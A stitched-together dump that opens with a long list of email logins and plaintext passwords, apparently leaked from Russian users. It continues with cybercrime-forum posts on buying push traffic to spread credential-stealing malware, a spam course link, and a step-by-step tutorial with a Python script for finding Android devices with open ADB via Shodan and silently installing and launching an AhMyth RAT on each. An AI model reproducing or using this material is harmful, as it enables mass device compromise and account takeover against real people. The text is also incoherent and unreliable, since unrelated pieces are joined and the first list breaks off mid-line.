Ваш логин - {garfild@mail.ru} , пароль - 240682
Ваш логин - {sergey@eks.perm.ru} , пароль - hfleuf
Ваш логин - {VadimP@raid.ru} , пароль - 7890
Ваш логин - {butchfido@mail.ru} , пароль - rrc1976
Ваш логин - {chetin@psu.ru} , пароль - euroglobus
Ваш логин - {zak@perm.raid.ru} , пароль - tony mail
Ваш логин - {iukul@perm.raid.ru} , пароль - vt79qbrp
Ваш логин - {amikon@raid.perm.ru} , пароль - assa
Ваш логин - {abond@citkami.ru} , пароль - papasasa
Ваш логин - {kkk@perm.raid.ru} , пароль - 1kkk1
Ваш логин - {kostin@adm.perm.ru} , пароль - rbhgbx
Ваш логин - {kvant@pi.ccl.ru} , пароль - 123456
Ваш логин - {saa@atnet.ru} , пароль - apipiKUj
Ваш логин - {tomax@mail.ru} , пароль - tv
Ваш логин - {Pboyicq@chat.ru} , пароль - 66134
Ваш логин - {aero_lev@mine.perm.su} , пароль - 123
Ваш логин - {afm0894@mail.ru} , пароль - marina
Ваш логин - {nabat-dir@mail.ru} , пароль - dbrnjhbz1
Ваш логин - {efandr@raid.ru} , пароль - ghbdtn
Ваш логин - {vvlad@raid.ru} , пароль - 123
Ваш логин - {manager@raid.ru} , пароль - 123
Ваш логин - {root@raid.ru} , пароль - 123
Ваш логин - {rea@raid.ru} , пароль - 123
Ваш логин - {support@raid.ru} , пароль - 123
Ваш логин - {alexz74@permonline.ru} , пароль - gordon
Ваш логин - {asff@mail.ru} , пароль - asffff
Ваш логин - {aero_alex@mine.perm.su} , пароль - 123
Ваш логин - {tentorium@permonline.ru} , пароль - tentapi
Ваш логин - {serggr@mail.ru} , пароль - lc2420ii
Ваш логин - {nikitenko@permonline.ru} , пароль - ver497
Ваш логин - {g-terz@pi.ccl.ru} , пароль - 0539 4
Ваш логин - {greatici@chat.ru} , пароль - 170875
Ваш логин - {Radm07@volgadmin.ru} , пароль - nick
Ваш логин - harley@mail,ru , пароль - 111
Ваш логин - {newton@perm.raid.ru} , пароль - newrona
Ваш логин - {kos@psk.surw.chel.su} , пароль - lari
Ваш логин - {dody@mail.ru} , пароль - 1029
Ваш логин - {lora@stlink.perm.ru} , пароль - 1000
Ваш логин - {den_sr@ecohelp.ru} , пароль - denis
Ваш логин - {rsl@pi.ccl.ru} , пароль - itpn
Ваш логин - {shul_a@chat.ru} , пароль - c3por2d2
Ваш логин - {pav@perm.raid.ru} , пароль - pav
Ваш логин - {modo@perm.raid.ru} , пароль - bob
Ваш логин - {SGimadeev@npz.perm.lukoil.com} , пароль - system
Ваш логин - {Alekhsandr.Teterin@psu.ru} , пароль - teter
Ваш логин - {tiger77@chat.ru} , пароль - win
Ваш логин - {ftpfil@mail.cl.spb.ru} , пароль - Avelkir
Ваш логин - {ss@perm.raid.ru}. , пароль - 1234567890
Ваш логин - {nicola999@mail.ru} , пароль - needle
Ваш логин - {alexmann@null.ru} , пароль - nullru
Ваш логин - {tkach2@psu.ru} , пароль - elsa
Ваш логин - {tkhach2@psu.ru} , пароль - elsa
Ваш логин - {viking_z@chat.ru} , пароль - windows
Ваш логин - {ura@perm.raid.ru} , пароль - sx3zqy3i
Ваш логин - {dryv@bayard.ru} , пароль - 535
Ваш логин - {fridman@mail.perm.ru} , пароль - lob
Ваш логин - {remiz@mega.ru} , пароль - remi577
Ваш логин - {leon@psu.ru} , пароль - cardinal
Ваш логин - {spard@chat.ru} , пароль - rew
Ваш логин - {kev@mail.ur.ru} , пароль - itpn
Ваш логин - {innok@norcom.ru} , пароль - dima
Ваш логин - {tiv5@mail.ru} , пароль - 041059
Ваш логин - {mav_asu@mail.ru} , пароль - SunStar917
Ваш логин - {serghch@mail.ru} , пароль - 22225054
Ваш логин - {realty@perm.raid.ru} , пароль - csct59qc
Ваш логин - {saa@pspu.ac.ru} , пароль - 140567
Ваш логин - {ais@mail.ru} , пароль - olenka
Ваш логин - {piter@perm.raid.ru} , пароль - xxxxxxx
Ваш логин - {kraeva@eks.perm.ru} , пароль - kraeva
Ваш логин - {spacemen@pi.ccl.ru} , пароль - ass
Ваш логин - {sergen@softhome.net} , пароль - clooc
Ваш логин - {panther@perm.raid.ru} , пароль - 41t1b19t
Ваш логин - {drv@perm.raid.ru} , пароль - htugvr5g
Ваш логин - {arc@raid.ru} , пароль - era
Ваш логин - {bogdan2@psu.ru} , пароль - ТШБЮ
Ваш логин - {ilya_k@mail.ru} , пароль - solikamsk
Ваш логин - {ice@perm.raid.ru} , пароль - 559262
Ваш логин - {starol@mail.ru} , пароль - berezniki
Ваш логин - {dotkh@psu.ru} , пароль - ad
Ваш логин - {fyutk@chat.ru} , пароль - fyutk
Ваш логин - {max_naz@mail.ru} , пароль - maxon81
Ваш логин - {ROGACHEV--S-@permonline.ru} , пароль - sox
Ваш логин - {vkap@mail.ru} , пароль - monitor
Ваш логин - {valex@betus.mtts.perm.ru} , пароль - gabbahey
Ваш логин - {mamonov@perm.raid.ru} , пароль - 8cxbxv8c
Ваш логин - {condor@perm.raid.ru} , пароль - rzfxmfsd
Ваш логин - {kruglov@perm.raid.ru} , пароль - zz
Ваш логин - {popov@psu.ru} , пароль - zz
Ваш логин - {Vladimir.Shushkhov@psu.ru} , пароль - va6000sh
Ваш логин - {dotkin@chat.ru} , пароль - ad
Ваш логин - {vladg@null.ru} , пароль - kissme
Ваш логин - {shirman@dionis.mtts.perm.su} , пароль - mahmut
Ваш логин - {tony@bibliogof.spb.ru} , пароль - antpwd2
Ваш логин - {z_zakir@hotmail.com} , пароль - may
Ваш логин - {alef@oztel.ozersk.ru} , пароль - sash
Ваш логин - {ickis@permonline.ru} , пароль - ickis
Ваш логин - {andrew@skamsk.ru} , пароль - krem
Ваш логин - {dlp@perm.raid.ru} , пароль - allumnjp
Ваш логин - {pavlinmail@mtu-net.ru} , пароль - pavlinnet
Ваш логин - {f_d_k@mail.ru} , пароль - 555
Ваш логин - {alexsft@perm.raid.ru} , пароль - yhafxewv
Ваш логин - {bilyov@icmm.ru} , пароль - 311079
Ваш логин - {shavr@psu.ru} , пароль - zz
Ваш логин - {tangan@psu.ru} , пароль - zz
Ваш логин - {norcrown@permonline.ru} , пароль - 0000
Ваш логин - pav@ , пароль - wsnet
Ваш логин - {jeka@perm.raid.ru} , пароль - jeka
Ваш логин - {kostoprav@null.ru} , пароль - ge[
Ваш логин - {login@permonline.ru} , пароль - porshe 911
Ваш логин - {humor@hosp4.psu.ru} , пароль - 123456
Ваш логин - {rudn@windoms.sitek.net} , пароль - raid_Witaliy
Ваш логин - {rabbit@tomcat.ru} , пароль - 337752
Ваш логин - {oshepkov@mail.ru} , пароль - 556786
Ваш логин - {chazov@perm.raid.ru} , пароль - japeupgn
Ваш логин - {roma@perm.raid.ru} , пароль - asxbcder
Ваш логин - {maxy@perm.raid.ru} , пароль - ashoka
Ваш логин - {ld@perm.raid.ru} , пароль - jhitg
Ваш логин - {Vasya_vvb@mail.ru} , пароль - natali
Ваш логин - {mikle_o@chat.ru} , пароль - morgot
Ваш логин - {Nikolay.Subbotin@psu.ru} , пароль - derkragan
Ваш логин - {konstan@permonline.ru} , пароль - ЯЙСМЯ
Ваш логин - {mpnovikov@vtau-bsd.pstu.ac.ru} , пароль - LoviloV
Ваш логин - {9og@perm.raid.ru} , пароль - gfhjkm
Ваш логин - {kurgan@betus.mtts.perm.ru} , пароль - 764
Ваш логин - {avm-1riftv@mail.ru} , пароль - tsn
Ваш логин - {kholkin@ermak.ru} , пароль - 786
Ваш логин - {barik@stv.ee} , пароль - barik
Ваш логин - {rogaleff@mail.ru} , пароль - xmasquadra
Ваш логин - {albert@perm.raid.ru} , пароль - n6552zuc
Ваш логин - {bykov@tts.magadan.su} , пароль - 510383
Ваш логин - {edik@lysva.ru} , пароль - dfk.nf
Ваш логин - {fed6@mail.ru} , пароль - 111
Ваш логин - {bud@mail.perm.ru} , пароль - bud
Ваш логин - {andrey@niiums.pstu.ac.ru} , пароль - 8ka14
Ваш логин - {smetan@psu.ru} , пароль - xx
Ваш логин - {sushin@psu.ru} , пароль - xx
Ваш логин - {sosnin@permonline.ru} , пароль - Overdrive
Ваш логин - {gpz@raid.ru} , пароль - 777
Ваш логин - {aero_kaz@mine.perm.su} , пароль - 123
Ваш логин - {vertip@psu.ru} , пароль - xx
Ваш логин - {sgimadeev@npz.perm.lukoil.com} , пароль - 250188
Ваш логин - {RShakirzyanov@npz.perm.lukoil.com} , пароль - munas
Ваш логин - {tpermiakova@ptu.perm.lukoil.com} , пароль - ty789o
Ваш логин - {grishuk@degacom.ru} , пароль - 777888
Ваш логин - {sead@mindless.com} , пароль - seadrd
Ваш логин - {kay@icn.bmstu.ru} , пароль - johnblade
Ваш логин - {ferap@psu.ru} , пароль - aGITMuGG
Ваш логин - {bauman_kay@mail.ru} , пароль - johnblade
Ваш логин - {mav@mtts.perm.ru} , пароль - andrei
Ваш логин - {aaalex@cmail.info.kuzbass.net} , пароль - ufolex
Ваш логин - {adma@first.ru} , пароль - 123
Ваш логин - {al@al.raid.ru} , пароль - 123
Ваш логин - {korekovv@perm.raid.ru} , пароль - hdu2drot
Ваш логин - {bserg@perm.raid.ru} , пароль - v1cq2shd
Ваш логин - {pnxs@mail.ru} , пароль - artem
Ваш логин - {igrunin@perm.raid.ru} , пароль - qdsa29up
Ваш логин - {zelenin@mail.perm.ru} , пароль - 6151
Ваш логин - {lopatin@lysva.ru} , пароль - AG722941
Ваш логин - {vita@psu.ru} , пароль - v012553
Ваш логин - {econika@perm.raid.ru} , пароль - u2sy3taa
Ваш логин - {sergio_k@permonline.ru} , пароль - 033
Ваш логин - {dudko@permonline.ru} , пароль - coil6149
Ваш логин - {niks@mail.ru} , пароль - nik312nk
Ваш логин - {bitka@ic.ospu.odessa.ua} , пароль - 612521
Ваш логин - {ilyapas@hotmail.com} , пароль - MAMA
Ваш логин - {gdv@icmm.ru} , пароль - c(pG6.
Ваш логин - {igor.kalinovsky@pagergate.ru} , пароль - garik
Ваш логин - {maxickv@usa.net} , пароль - maxix
Ваш логин - {pediatric@psu.ru} , пароль - 12345
Ваш логин - {ice@tomcat.ru} , пароль - sub05vi
Ваш логин - {sergcat@tomcat.ru} , пароль - 041918
Ваш логин - al_al_kam@hotmail , пароль - 561056
Ваш логин - {zahar6@psu.ru} , пароль - da4657za
Ваш логин - {astro@poptsov.ru} , пароль - 784
Ваш логин - {info@poptsov.ru} , пароль - 212
Ваш логин - {tema@perm.raid.ru} , пароль - avesqssh
Ваш логин - {ancor@perm.raid.ru} , пароль - 82yffpgv
Ваш логин - {al_al_kam@mail.ru} , пароль - 561056
Ваш логин - {gvg@dorstroy.raid.ru} , пароль - 4523
Ваш логин - {rudenko@dorstroy.raid.ru} , пароль - 6451
Ваш логин - {litvin@dorstroy.raid.ru} , пароль - 1104
Ваш логин - {varlam@psu.ru} , пароль - xx
Ваш логин - {maxickv@windoms.sitek.net} , пароль - mig
Ваш логин - {zoran@deskmail.com} , пароль - q
Ваш логин - {ancor@perm.reid.ru} , пароль - 1974b
Ваш логин - {diaghsch@perm.raid.ru} , пароль - 91tpt784
Ваш логин - {parsec@perm.raid.ru} , пароль - gen47
Ваш логин - {sam@perm.raid.ru} , пароль - uhcnpwzp
Ваш логин - {padas@go.ru} , пароль - 4910
Ваш логин - {antonios@perm.raid.ru}. , пароль - nnzh0832
Ваш логин - {pavell@ellink.ru} , пароль - jkmuf
Ваш логин - {red@valley.ru} , пароль - redred
Ваш логин - {ab4992@mail.sitek.ru} , пароль - 1985
Ваш логин - {acelisev@exchange.telekom.lv} , пароль - love
Ваш логин - {maxcreft@mail.ru} , пароль - vfrc
Ваш логин - {yasha@osu.ac.ru} , пароль - 1955
Ваш логин - {ValikCD@mail.ru} , пароль - 123
Ваш логин - {eldgar@chat.ru} , пароль - 11
Ваш логин - {dba@uc.ru} , пароль - tdutcnb
Ваш логин - {egor@online.ee} , пароль - orion
Ваш логин - {bobster@mail.ru} , пароль - dommod
Ваш логин - {srochko@math.isu.runnet.ru} , пароль - trustno1
Ваш логин - {saturnnet@mail.ru} , пароль - TOPIN
Ваш логин - {vova@ush-soft.univ.kiev.ua} , пароль - <jkmijq
Ваш логин - {Vadim@ics.perm.su} , пароль - destroyer
Ваш логин - {hotnews@perm.raid.ru} , пароль - 1
Ваш логин - {valexandr@mail.ru} , пароль - gabba
Ваш логин - {marion105@hotmail.com} , пароль - dashka5
Ваш логин - {Petrenko@mail.ru} , пароль - pit2k
Ваш логин - {Artem.Chlegov@p22.f32.n5004.z2.fidonet.org} , пароль - archa
Ваш логин - {goldobin@perm.raid.ru} , пароль - uspdppwn
Ваш логин - {uralimpeks@chat.ru} , пароль - ural49
Ваш логин - {shassa@lbl.nsys.by} , пароль - gondich
Ваш логин - {kbac@mtts.perm.ru} , пароль - kamaz3
Ваш логин - {lazun@privat.poltava.ukrpack.net} , пароль - edison
Ваш логин - {dark@asu.pstu.ac.ru} , пароль - dark
Ваш логин - {goblinvova@mail.ru} , пароль - philips
Ваш логин - {mmb_spb@comset.net} , пароль - mmb_spb
Ваш логин - {ilya@raid.ru} , пароль - palafitte
Ваш логин - {ChabanovMU@info.sgu.ru} , пароль - xf,fyjdvbif
Ваш логин - {naskor@permonline.ru} , пароль - nas
Ваш логин - {KostikX@silvinit.ru} , пароль - zeland
Ваш логин - {malin1@psu.ru} , пароль - ktzyjjcl
Ваш логин - {rec@permonline.ru} , пароль - rec
Ваш логин - {mov@sybase.rspd.net} , пароль - dodik
Ваш логин - {tomas_303@yahoo.com} , пароль - 1
Ваш логин - {teter@psu.ru} , пароль - 084008
Ваш логин - {buckfirst@mail.ru} , пароль - 280586
Ваш логин - {dmitriy@ice.perm.ru} , пароль - zip144
Ваш логин - {drv@ics.perm.su} , пароль - luka-3882
Ваш логин - {karate@raid.ru} , пароль - xjna4s6v
Ваш логин - {vikiv@mail.ru} , пароль - vfhbyf
Ваш логин - {puk@mail.ru} , пароль - 04823
Ваш логин - {karate@perm.raid.ru} , пароль - xjna4s6v
Ваш логин - {galinur@chat.ru} , пароль - 123654
Ваш логин - {lyag@psu.ru} , пароль - al2712ly
Ваш логин - {knada@permonline.ru} , пароль - rjkney
Ваш логин - {butcher@p777.f2.n5054.z2.fidonet.org} , пароль - kiska
Ваш логин - {lerauralgreat@mail.ru} , пароль - 633895
Ваш логин - {borisov55@chat.ru} , пароль - nbvcxz
Ваш логин - {mam@perm.raid.ru} , пароль - e2yyt165
Ваш логин - {p502@simbir.ru} , пароль - 04020040154
Ваш логин - {vel.ru@zmail.ru} , пароль - asdf
Ваш логин - {malceva@prognoz.ru} , пароль - dina
Ваш логин - {rat2111@mail.ru} , пароль - rat
Ваш логин - {pfc@rid.ru} , пароль - v3iwsa13
Ваш логин - {dens@raid.ru} , пароль - 28743638
Ваш логин - {natalie@perm.raid.ru} , пароль - aplavina
Ваш логин - {dvp@mail.wplus.net} , пароль - 5843014
Ваш логин - {pierro@dds.nl} , пароль - gthtgenmt
Ваш логин - {jll@mail.ru} , пароль - breathless
Ваш логин - {MaX_M_M@mail.ru} , пароль - enter
Ваш логин - {kama@dionis.mtts.perm.ru} , пароль - 120570
Ваш логин - {helg@perm.raid.ru} , пароль - xtl7gsrf
Ваш логин - {victor@raid.ru} , пароль - vitya
Ваш логин - {elcom@perm.ru} , пароль - 22250663
Ваш логин - {dron@permonline.ru} , пароль - rhjrec
Ваш логин - {deon@stratum.ac.ru} , пароль - d12345
Ваш логин - {goga@raid.ru} , пароль - jdgJYm6s
Ваш логин - {tru-mfg@usa.net} , пароль - tru-mfg
Ваш логин - {marina@stm.raid.ru} , пароль - dfk.if
Ваш логин - {internova@pagergate.ru} , пароль - leonid
Ваш логин - {andrey@mega.ru} , пароль - a060on
Ваш логин - {anbs@mega.ru} , пароль - a060on
Ваш логин - {acs@perm.raid.ru} , пароль - pfotvnjq
Ваш логин - {mitgun@perm.raid.ru} , пароль - mitgun
Ваш логин - {msv@perm.raid.ru} , пароль - igppzutu
Ваш логин - povarnicin@mail , пароль - 654186
Ваш логин - {il@perm.raid.ru} , пароль - БСДД
Ваш логин - {povarnicin@mail.ru} , пароль - 654186
Ваш логин - {rus07@dionis.omskelecom.ru} , пароль - 33777567
Ваш логин - {eagle@myhost.ru} , пароль - norod
Ваш логин - {levsha@perm.raid.ru} , пароль - tjafzci5
Ваш логин - {avk-serves@permonline.ru} , пароль - 0405
Ваш логин - {uchebnik@mail.ru} , пароль - 27.04.99
Ваш логин - {ordroo@perm.raid.ru} , пароль - 123
Ваш логин - {geotour@perm.raid.ru} , пароль - cb0zn3re
Ваш логин - {permtus@permonline.ru} , пароль - fuck
Ваш логин - {igor@ccl.ru} , пароль - 123
Ваш логин - {cro@ocsu.ru} , пароль - ucro
Ваш логин - {ddu@perm.raid.ru} , пароль - 31478
Ваш логин - {buratino@perm.raid.ru} , пароль - 3zd9qrd8
Ваш логин - {sailor_dima@mail.ru} , пароль - nonty
Ваш логин - {tolikk@mail.ru} , пароль - gbhj;jr
Ваш логин - {Igork@raid.ru} , пароль - 544706
Ваш логин - {admin@psma.ru} , пароль - qqq
Ваш логин - {maugli@perm.raid.ru} , пароль - 1563yvup
Ваш логин - {su853@perm.raid.ru} , пароль - anijqwzz
Ваш логин - {coral@perm.raid.ru} , пароль - iexjyj0b
Ваш логин - {Alex_ey@mail.ru} , пароль - 129659
Ваш логин - {mishins@smit.kharkov.ua} , пароль - donnerjack
Ваш логин - {spectr-perm@mtts.perm.ru} , пароль - spectrum
Ваш логин - {misharov@mail.ru} , пароль - vfhbyf
Ваш логин - {sergeds@aport.ru} , пароль - 555
Ваш логин - {bug@perm.raid.ru} , пароль - y93hycc2
Ваш логин - {pppilya@vpti.vladimir.ru} , пароль - perl
Ваш логин - {Oleg_79@mail.ru} , пароль - BlackKnight
Ваш логин - {school@lyceum.pstu.ac.ru} , пароль - wasddsaw
Ваш логин - {79026865725@sms.mts.ru} , пароль - ira282
Ваш логин - {ingos@mpm.ru} , пароль - qqq
Ваш логин - {Levdim@perm.raid.ru} , пароль - yqjqnuwh
Ваш логин - {mda@energo.perm.ru} , пароль - D
Ваш логин - {pavlin_@mail.ru} , пароль - pavlin
Ваш логин - {bdv@raid.ru} , пароль - 76291024
Ваш логин - {maxim@eks.perm.ru} , пароль - maxim
Ваш логин - {vitaly_selivanoff@yahoo.com} , пароль - selivanv
Ваш логин - {wws@aport.ru} , пароль - rapier
Ваш логин - {mike@au.ru} , пароль - a510133z
Ваш логин - {iwfir@mail.ru} , пароль - 121981
Ваш логин - {ekaterinay@mail.ru} , пароль - dfyz
Ваш логин - {slava@permonline.ru} , пароль - s3dv125
Ваш логин - {n21217@cnat.ru} , пароль - 26sergz3
Ваш логин - {shein@vtau-bsd.pstu.ac.ru} , пароль - bac7780
Ваш логин - {ywam@perm.raid.ru} , пароль - vpwzqu1a
Ваш логин - {airatm@hotamil.com} , пароль - dybvfybt
Ваш логин - {pero@perm.raid.ru} , пароль - artem
Ваш логин - {sanders@permonline.ru} ,
В данной теме отвечаю на все ваши вопросы касательно условно бесплатного
траффика.
Тик ток, инстаграм, ютуб шортс, тг и другие источники.
Постараюсь помочь каждому!
Доброго времени суток, форумчане.
Spoiler: Предисловие
Я совсем зеленый на данном форуме, прошу не кидать помидорами, а поддержать и
обсудить актуальную тему.
А именно трафик/инсталлы.
Но дабы было интересней, я накидаю статейку от себя.
Затрону наиболее простую тему по добыче инсталлов, а именно тизерные/пуш сети.
Оттуда получить инсталлы можно при минимальном бюджете и в сжатые сроки.
В сети интернет есть сотни пуш сетей. В данной статье мы разберем одну из
топов СНГ "Кликаду".
СНГ - это не значит, что трафик там только Русско говорящий. Как заявляется
сама платформа:
240+ стран в охвате и более 5.8 миллиарда показов в сутки. (Не забываем о
ботах. Чем беднее сеть, тем больший % ботов вы встретите в работе).
Но перед этим, давайте разберем, что такое пуш трафик. (Именно на нем и будем делать акцент. Есть еще вариации получения трафика из таких партнерок, при интересе - распишу материал подробнее).
![](/proxy.php?image=https%3A%2F%2Fsendpulse.com%2Fblog%2Fwp-
content%2Fuploads%2F2018%2F08%2Fblog_4.2-1200x900.png&hash=bcbce77c88c5d3a4ee0fd3c06534c9db)
При посещении некоторых сайтов (в частности порталы софтов) вам предлагают
подписаться на "уведомления", после согласия Вас "продадут" одной из таких
сетей и вы будете получать уведомления о разных продуктах. Начиная от
антивирусов и заканчивая казино.
Кейс на тему казино через пуши - <https://protraffic.com/articles/kejs-
gembling-na-push-uvedomlenijah-1056.html> - познавательно, дабы понять - что
это такое и с чем это едят.
Но мы тут не занимаемся гемблой, нам интересны получения логов - поэтому
разбираемся дальше:
В любой (нормальной) сетке есть модерация, поэтому вам не получится
запуститься сразу на свой вредонос.
Для этого мы ищем любой оффер соответствующий нашей сетке.
Все офферы можно найти на портале Партнеркин - https://partnerkin.com/ (p.s.
Дальнейшие наши действия такие:
В каждой сетке можно отфильтровать получаемый трафик по гео, интересам, возрасту, полу и пр.
Стоимость трафика выходит +- как и с биржи инсталлов. А качество на голову выше, так и отсутствие соседей
Всем спасибо. Получилось очень сжато, т.к. не знаю, будет ли интересно это местным. Если проявите интерес к теме - опубликую более развернутый и более интересный материал
[Чарли Спамер] Обучение SPAM Рассылкам
You must spend at least 7 day(s) on the forum to view the content.
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- folder.png&hash=63d46597e69ae4a51888711a37d2bf45&return_error=1)
](https://mega.nz/folder/LxlWnDKQ#FYChVjm_MUSBI6Mlo89vow)
mega.nz
автор - не я, скинул знакомый с 3х буквенного форума
Доброго времени , в этой статье я расскажу как делать загрузки с бирж (pk/android). Будет поделом барыгам, "обучающим" за 1500-2500 этой фигне .
You must have at least 20 message(s) to view the content.
выложил Fraudman c exploit.in
Привет, XSS'овец, сегодня поведаю тебе о способе добычи бесплатных установок для твоего андроид-ботнета/RAT'a/Клиппера и прочей нечисти. В этой статье будет использоваться инструмент под названием PhoneSploit. О его возможностях мы поговорим чуть позже. Прежде чем рассказать о самом способе, сначала расскажу о его плюсах и минусах.
Плюсы:
Минусы:
Всю статью я разжую максимально подробно, чтобы у тебя, %username%, не
возникли вопросы. Статья делится на 4 этапа, поэтому можно считать это за
пошаговый мануал.
Садись поудобнее, мы начинаем!
ЭТАП I. Установка PhoneSploit и пару слов об уязвимости.
Уязвимость андроид устройств заключается в ADB.
Android Debug Bridge (adb )- это универсальный инструмент командной строки, который позволяет взаимодействовать с устройством. Команда adb облегчает различные действия устройства, такие как установка и отладка приложений, и предоставляет доступ к оболочке Unix, которую можно использовать для выполнения различных команд на устройстве Обычно разработчики подключаются к службе ADB, установленной на устройствах Android, с помощью USB-кабеля, но также можно использовать ADB wireless, включив daemon-сервер на TCP-порте 5555.
Click to expand...
И эксплуатировать эту уязвимость мы будем при помощи PhoneSploit.
PhoneSploit - проект на Python2 с открытым исходным кодом. PhoneSploit может использовать в Android открытые порты Adb. Этот скрипт доступен как для Linux, так и для Windows.
Click to expand...
Как и было сказано выше, инструмент можно установить как на Linux, так и на Windows. Приступим к установке.
Spoiler: Установка на Windows
Так как скрипт написан на Python 2-ых версий, соответсвенно устанавливаем
именно именно эту версию. Качаем с официального
сайта.
Далее переходим в репозиторий на
гитхабе, и скачиваем архив со скриптом.
Для удобства перекидываем файлы с архивом прямо в папку с питоном, и разархивируем архив abd.rar в текущию директорию. Должно получиться примерно так:
Установим необходимую для запуска библиотеку - colorama, командой; pip install colorama
Ну и для теста попробуем запустить скрипт командой: python.exe main.py
Spoiler: Установка на Linux.
С установкой на Unix системы всё гораздо проще. Открываем терминал, затем поочерёдно вводим следующие команды:
git clone https://github.com/metachar/PhoneSploit cd PhoneSploit pip install colorama python2 main_linux.py
И если покажется интерфейс скрипта, то всё прошло гладко.
После установки инструмента, переходим ко второму этапу.
ЭТАП II. Знакомство с Shodan и поиск уязвимых устройств.
Что же представляет собой поисковик SHODAN?
Система SHODAN опрашивает порты подсоединенных к сети машин и собирает выдаваемые в ответ баннеры, после чего индексирует эти баннеры на предмет последующего быстрого отыскания соответствующих устройств. В итоге такой обработки, вместо того, чтобы предоставлять специфический контент страниц, содержащих конкретное поисковое слово запроса, SHODAN помогает своим пользователям отыскивать специфические узлы сети: настольные системы, серверы, роутеры, свитчи, веб-камеры, принтеры и т.д.
Click to expand...
Для более "узкого" поиска в Shodan, существует множество фильтров, вот некоторые из них:
Конечно же эти фильтры можно использовать в связке, тем самым получив максимально нужный диапазон жертв.
Итак, теперь, когда мы познакомились с нашим поисковиком, а также
предварительно залогинилсь в нём, покажу нужный нам дорк:
android debug bridge product:”Android Debug Bridge”
После попытки поиска, получаем IP адреса андроид устройств:
Устройства найдены, можем приступить к следующему этапу.
ЭТАП III. Обзор функционала PhoneSploit.
Не буду писать про каждый функционал отдельно, поэтому просто посмотри на текст ниже:
Code:Copy to clipboard
____ __ _____ __ _ __
/ __ \/ /_ ____ ____ ___ / ___/____ / /___ (_) /_
/ /_/ / __ \/ __ \/ __ \/ _ \__ \/ __ \ / / __ \/ / __/
/ ____/ / / / /_/ / / / / __/__/ / /_/ / / /_/ / / /_
/_/ /_/ /_/\____/_/ /_/\___/____/ .___/_/\____/_/\__/
/_/
[ 1 ] показать подключенные устройства [ 6 ] Запись экрана телефона [ 11 ] удаление приложения
[ 2 ] отключить все устройства [ 7 ] снимок экрана на телефоне [ 12 ] показать журнал работы устройства в реальном времени
[ 3 ] подключение нового телефона [ 8 ] перезапуск сервера [ 13 ] дамп информации о системе
[ 4 ] доступ к командной оболочке на телефоне [ 9 ] перенос папок с телефона на ПК [ 14 ] Список всех приложений на телефоне
[ 5 ] Установить apk на телефон [ 10 ] Выключить устройство [ 15 ] запустить приложение
[ 99 ] выход [ 0 ] очистить [ p ] Следующая страница v1. 2
Попробуем подключиться к устройству. Выбираем 3й пункт, далее вводим IP телефона:
Проверим подключения, выберем первый пункт:
Теперь подготовим билд нашего зверька, загрузим его на телефон. Выбираем 5й пункт, далее вводим прямой путь до .apk файла (я устанавливаю билд [AhMyth](https://github.com/AhMyth/AhMyth-Android- RAT/releases/tag/v1.0-beta.1) RAT'a):
Всё практически готово, осталось запустить наше приложение. Узнаем список приложений на телефоне выбрав 14й пункт:
Среди всех приложений, нам нужно найти имя нашего пакета. Я использовал AhMyth RAT, поэтому быстро нашёл нужный нам пакет:
Ну и для запуска выбираем 15й пункт и вводим имя нашего пакета (ВАЖНО: Вводить нужно только имя, в моём случае это: ahmyth.mine.king.ahmyth):
Ну и ловим соединие, но уже через РАТ:
Этап IV. Автоматизация с помощью скриптов.
Для автоматизации всего этого дела, у меня есть 2 скрипта. Один из них парсит IP'шники с Shodan'a, и находится в открытом доступе. И второй, нужен для автоматизации прогруза apk файла по IP'шникам находящимся в файле.
И так, первый скрипт.
Написан на Python3 и доступен в открытом виде на GitHub.
Spoiler: Установка на Windows
Download zip: https://github.com/LimerBoy/PS-Grabber/archive/master.zip
Unzip folder PS-Grabber
cd PS-Grabber/ pip install -r requirements.txt python grabber.py
Spoiler: Установка на Linux.
git clone https://github.com/LimerBoy/PS-Grabber.git cd PS-Grabber/ sudo pip3 install -r requirements.txt python3 grabber.py
Запускаем скрипт и просто вводим количество страниц, с которых спарсятся IP:
В папке logs появится текстовой файл, в котором будут записаны ИПшники.
Скрипт #2.
Нет в паблике, был написан моим знакомым на Python3. Сам скрипт служит для
прогруза файла, в коде нужно будет указать полный путь до .apk файла,
текстовика с IP'шниками и имя пакета:
ВАЖНО! Этот скрипт не работает на Windows машинах, поэтому запускай на линуксе.
Spoiler: Код скрипта
Python:Copy to clipboard
import subprocess
from pathlib import Path
import os
import time
logo = '''
__ ______ ____ ___ ____ _ _ __ ___ _ _ ____ _ ___ _
\ \/ / ___/ ___| |_ _/ ___| | | | |__ _ _ \ \ / / |_ __| |_ _ _ __ _| |/ ___| |__ / _ \ ___| |_
\ /\___ \___ \ | |\___ \ | | | '_ \| | | | \ \ / /| | '__| __| | | |/ _` | | | _| '_ \| | | / __| __|
/ \ ___) |__) | | | ___) | | | | |_) | |_| | \ V / | | | | |_| |_| | (_| | | |_| | | | | |_| \__ \ |_
/_/\_\____/____(_)___|____/ | | |_.__/ \__, | \_/ |_|_| \__|\__,_|\__,_|_|\____|_| |_|\___/|___/\__|
|_| |___/
________________________________
| Author Telegram: @XazkerBoy
| Logo & Manual by V1rtualGh0st
---------------------------------
'''
print(logo)
apkpath = '/root/PhoneSploit/a.apk' #Path to the APK file that should be installed
apkpkg = 'system.operating.dominance.proj' #APK package name (can be seen by installing aapt and running 'aapt dump badging <path-to-apk> | grep package:\ name')
ippath = '/root/results.txt' #Path with IPs of devices, on which the PAK will be installed
delay = 3
def checkconnect(ip):
process = subprocess.Popen(['adb', 'connect', ip + ':5555'], stdout=subprocess.PIPE)
time.sleep(delay)
data = process.communicate()
if 'unable to connect' in data[0]:
os.system('adb disconnect')
return False
return True
def install(ip):
os.system('adb -s ' + ip + ' shell settings put global verifier_verify_adb_installs 0')
time.sleep(delay)
os.system('adb -s ' + ip + ' shell settings put global package_verifier_enable 0')
time.sleep(delay)
os.system('adb -s ' + ip + ' uninstall ' + apkpkg)
time.sleep(delay)
os.system('adb -s ' + ip + ' install ' + apkpath)
time.sleep(delay)
os.system('adb -s ' + ip + ' shell monkey -p ' + apkpkg + ' -v 10')
time.sleep(delay)
os.system('adb disconnect')
if apkpath == '':
print('No APK selected!')
exit()
my_file = Path(apkpath)
if not my_file.exists():
print('That APK doesnt exist!')
exit()
if ippath == '':
print('No file with IPs selected!')
exit()
my_file = Path(ippath)
if not my_file.exists():
print('That IP file doesnt exist!')
exit()
try:
os.system('adb kill-server')
except:
print('An error has occured\nMaybe ADB is not installed, please install it and restart the app')
exit()
os.system('adb tcpip 5555')
